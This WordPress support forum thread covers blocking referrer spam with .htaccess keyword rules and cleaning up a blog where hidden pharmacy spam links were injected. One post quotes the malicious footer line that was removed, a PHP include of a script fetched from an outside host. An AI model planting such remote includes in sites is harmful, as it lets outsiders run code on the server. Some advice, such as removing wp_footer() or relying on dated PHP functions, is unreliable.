WordPress › Support » I am under phentermine attack?

whooami
Member
Posted 2 years ago #

And I still wonder how to do this using .htaccess.

and Ive explained repeatedly, you appear to not be reading.

RewriteCond %{HTTP_REFERER} ^(.*)pill(.*)$ [NC]

catches ANY referer with the string pill in it.

RewriteCond %{HTTP_REFERER} ^(.*)phent(.*)$ [NC]

catches any string with the partial match phent in it.

RewriteCond %{HTTP_REFERER} ^(.*)mortgage(.*)$ [NC]

catches any string with the word mortgage in it.

Thusly,

RewriteCond %{HTTP_REFERER} ^(.*)pill(.*)$ [NC]
RewriteCond %{HTTP_REFERER} ^(.*)phent(.*)$ [NC]
RewriteCond %{HTTP_REFERER} ^(.*)mortgage(.*)$ [NC]
RewriteRule ^.* - [F]

sends a 403 to any referer with the strings, pill, phent, or mortgage.

Ive provided numerous examples, as well as links. I suspect you arent reading, which doesnt help to motivate me to continue replying. Not to mention that we are 30-some odd posts into a thread, and it took "pulling teeth" to get an even acknowledgment of my suggestion..
mwillems
Member
Posted 2 years ago #

You are really grumpy, aren't you? Of course I am reading. The question was "should I really kill ALL mentions of those words?"

Eg if I do pill, what if www.rape-and-pillage.com refers to me? if I kill credit, what if www.credit.co.uk wants to use my services?

FYI, my .htaccess now looks like this, and I have only just started: I suspect I will have 1,000 terms in there before I am done....;)

RewriteCond %{HTTP_REFERER} ^(.*)phentermine(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)dietpills(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)credit-card(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)mortgage(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)las-vegas(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)casino(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)poker(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)black-jack(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)tramadol(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)xanax(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)vioxx(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)valtrex(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)celexa(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)paxil(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)hoodia(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)zyrtec(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)allegra(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)diflucan(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)cheap-soma(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)lipitor(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)hydrocodone(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)ambien(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)zoloft(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)valium(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)floxacin(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)erectile-dysfunction(.*)$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)adipex(.*)$ [NC]
Otto42
Moderator
Posted 2 years ago #

Did you try the referrer karma plugin? It seems like it would work based on parsing the domain sending the referrer spam to you, looking for a link to your site.
mwillems
Member
Posted 2 years ago #

Otto,

There appears to be a big battle going on here, see above.

I tried the plugin, but it actually did not work for me, for some reason (database tables made, but activate it and I could not see my own web site, and yet no logging was done).

Plus, one poster above thinks it is laughable and idiotic (etc) to use that plugin - hence I tried .htaccess at his advice..

Michael
Otto42
Moderator
Posted 2 years ago #
Well, the referrer karma thing is a bit more robust and might take care of it in a more automatic fashion, but the .htaccess would be the best way if there was some way to block the requests without adding a ton of rules.

I did notice this in the thread:

AHA -- the string as suggested by the sacript was wrong: it was <?php include_once ("/var/www/html/willems.ca/blog/wp-content/referrer-karma.php"); check_referrer(); ?>
That should have read <?php include_once ("/blog/wp-content/referrer-karma.php"); check_referrer(); ?>

Umm... No. The script gave you this code for a reason:
<?php include_once ("/var/www/html/willems.ca/blog/wp-content/referrer-karma.php"); check_referrer(); ?>

To use it, you should modify Wordpress' index.php file (the one in the main blog directory) to have this at the top of the file:
```
<?php
include_once ("/var/www/html/willems.ca/blog/wp-content/referrer-karma.php");
check_referrer();
... rest of index.php ...
```
That is assuming that you put the referrer-karma into the wp-content directory of the website, of course. Using the wrong path like you did above would indeed kill your site. You really should use the full local path to the file.

Alternatively, this would probably work as well:
```
<?php
include_once ("./wp-content/referrer-karma.php");
check_referrer();
... rest of index.php ...
```
The point being that you need to provide the location of the file either as an absolute path or a relative path. Either way.
mwillems
Member
Posted 2 years ago #

Ah.. while /var/... is not accessible from there.. if I am in /blog/, i.e. relative to www.domainname.ca, surely /blog/wp-content/referrer-karma.php shoudl work?

Anyway you are right, a relative link will work - best try that then.

But if you both agree that .htaccess is the way to go.. how many drugs and scams can tehre really be?
Otto42
Moderator
Posted 2 years ago #

Ah.. while /var/... is not accessible from there.. if I am in /blog/, i.e. relative to www.domainname.ca, surely /blog/wp-content/referrer-karma.php shoudl work?

No, we're not talking about being relative to the URL. We're talking relative to the file system.

The /var/whatever thing absolutely will work. Period. Using the correct absolute and full path to the file will allow it to find the file. Remember, this is a script running on your machine. It's not looking at URLs, it's looking at files.

But if you both agree that .htaccess is the way to go.. how many drugs and scams can tehre really be?

Lots. Which is why the referrer karma thing is a decent approach. It will examine all incoming referrers, and if they're faked (because the referring URL doesn't actually have a link to you on their site), then the domain gets blacklisted automatically. And none of the Wordpress stuff ever runs, because it just returns 403 from then on. The problem with this approach is that it still requires a database connection for each hit, so your server could be impacted a lot more than the .htaccess approach would be.
mwillems
Member
Posted 2 years ago #

That makes sense on all counts. And since server load is the big issue, perhaps I will start with .htaccess, and go to the referrer karma if I still see an issue.

I have enabled .htaccess (allowing "all" in httpd.conf) and written in a long .htaccess file. (Not sure if it is working yet: if I add my own domain name as a forbidden referer keyword, it still allows me to go to my site by clicking on my site - though maybe that is different)

Thanks all for your help.... truly appreciate it.
Otto42
Moderator
Posted 2 years ago #

Don't forget that last line with the [F] in it. That's the critical part.

RewriteRule ^.* - [F]
mwillems
Member
Posted 2 years ago #

That's there, but it does not work. I am doing something stupid - not the first time I am sure :-)
al-zarwani
Member
Posted 2 years ago #

Apologies if I'm posting this in the wrong place, but this was the closest thing I could find searching for a thread that answered my question.

I've just noticed that someone has managed to insert a hidden div on my WP blog crammed with links to Xanax and Cialis and so forth. The code looks like this:

<div id="goro"><a href="http://damm.bloomu.edu/mediawiki/?q=1863" title="Cheap Phentermine C O D">Cheap Phentermine C O D</a><br>

I'm using the Cutline Theme, but that doesn't seem to be the source of the hole. If I switch themes (to Hiperminimalist), the SPAM code still appears.

I've gone hunting in the code for the template pages, and haven't found anything. Searching all the Wordpress pages seems like a daunting task, and blocking terms in the htaccess seems like much more effort than I'm willing to put in.

Would Referrer Karma work for me? I used Spam Karma for comment SPAM, with mixed results.
moshu
Member
Posted 2 years ago #

Check the main index.php (short and sweet) in your WP root directory.

If it's there - somebody gained access to your site: either through your files or somewhere else on the server.

Make sure you do NOT have writable files (chmod 666) on your blog.
You may also want to read: http://codex.wordpress.org/Hardening_WordPress
al-zarwani
Member
Posted 2 years ago #

Thanks very much! I checked the index, and it's clean. Which is a bit of a relief, I guess. I'll sift through the guide to hardening Wordpress. Thanks for the link.

It looks like the files in my Wordpress directory have permissions set to 755. Is that OK?

Appreciate your help. Should I report this to my hosting company?
moshu
Member
Posted 2 years ago #

Yes, reporting always should be the very first thing!

Permissions: folders 755, files 644.
al-zarwani
Member
Posted 2 years ago #

OK, thanks again. Permissions are set correctly. I had a look through the the guide to hardening wordpress, which was very helpful and very well done.

I'm pretty careful about security. It's possible someone left a keystroke logger on my Mac while I was out, but that strikes me as paranoid.

I'm letting the hosting company (one of WP's recommended) know.

BTW - I was glad to find the SSL WP-Admin plugin, but couldn't use it. Once activated, it redirected my login page to plugin.php. Deleted it from the directory and all's well again. Just to let you know, since it's recommended in the codex.

Thanks again for your help. I sort of suspect the hosting company is going to blame a hole in WP first. If so, I'll post here again.
al-zarwani
Member
Posted 2 years ago #

Here's the response back from my hosting company:

The programs that operate database-driven sites are vulnerable to hackers, who can (and do) exploit bugs in those programs to gain unauthorized access to your site.

1. Set register_globals to OFF
2. Turn off Display Error/Warning Messages. set error_display to ZERO
3. Never run unescaped queries
4. Validate all user inputs. Items on Forms, in URLS and so on
5. Move Config and files containing Passwords to mysql to a Secure directory outside of the public_html folder
6. Access Control, U don't want ya user to have access to Admin function or Clean up scripts
7. htaccess is your friend use it to deny people (we also have a easy deny manager too in the cpanel)
8. PHP can parse any valid script, whether it is called foo.php, very_long_name.php.php.php, or even willeymtard.bat. Using the default extension of ".php" means that before your hackers start you have already told them you are using PHP. As mentioned, you can use any filename for your scripts - if you are using PHP for every script on your server, consider using the ".html" extension for your scripts and making PHP parse HTML files you can change your file extension by adding this line to the htaccess or turn it on via the add type handler in the cpanel (AddType application/x-httpd-php .php)
9. To protect against SQL injection attacks Sometimes hackers will try to screw up you database by inserting SQL code into your form input fields. They can for example, insert code that could delete all the data in your database!
To protect against this, you need to use this PHP function:
mysql_real_escape_string()
This function escapes (makes safe) any special characters in a string (programmers call text a 'string') for MySQL.
Example:
$name = $_REQUEST['name'];
$safe_name = mysql_real_escape_string($name);
Now you know the variable $safe_name, is safe to use with your SQL code.
10. Keep the PHP code to yourself. If anyone can see it they can expliot vulnerabilities. You should take care to store your PHP files and the necessary passwords to access your MySQL databases in protected files or folders. The easy way to do this is to put the database access passwords in a file with a .inc.php extension (such as config.inc.php), and then place this file in a directory which is above the serverâ€™s document root (and thus not accessible to surfers of your site), and refer to the file in your PHP code with a require_once command. By doing things this way, your PHP code can read the included file easily but hackers will find it almost impossible to hack your site.

You can find more information about hardening your PHP scripts at: http://phpsec.org/projects/guide/ or http://www.hardened-php.net/
and finally
http://www.reaper-x.com/2007/09/01/hardening-wordpress-with-mod-rewrite-and-htaccess/

Seems like a boilerplate response. I'm guessing that WP already takes most of these precautions, and I'm worried about messing around with WP's file structure or tampering with the code. I don't really know PHP.

Based on this, does it sound to you like we have a hole in WP? I'm using the latest version.
al-zarwani
Member
Posted 2 years ago #

In the meantime, I did a little searching on Google and found the offending div id="goro" on another WP blog, http://nusratfateh.com/wp/?page_id=4, also in the footer. See also this unresolved thread from the WP forum. http://wordpress.org/support/topic/139455?replies=5

What's going on? I'm in way beyond my depth. But I'd really like to get rid of this vandalism.
al-zarwani
Member
Posted 2 years ago #

FYI, problem solved. Removed this line of code from the footer file:
<?php include('http://wordpress.net.in/statcounter.php'); ?>
glemak
Member
Posted 1 year ago #

had the same unwanted spam link issue - removed this from footer.php: <?php wp_footer() ?>

« Previous 1 2

Topic Closed

This topic has been closed to new replies.

WordPress.org

Forums

I am under phentermine attack? (49 posts)

Topic Closed

About this Topic

Tags

Code is Poetry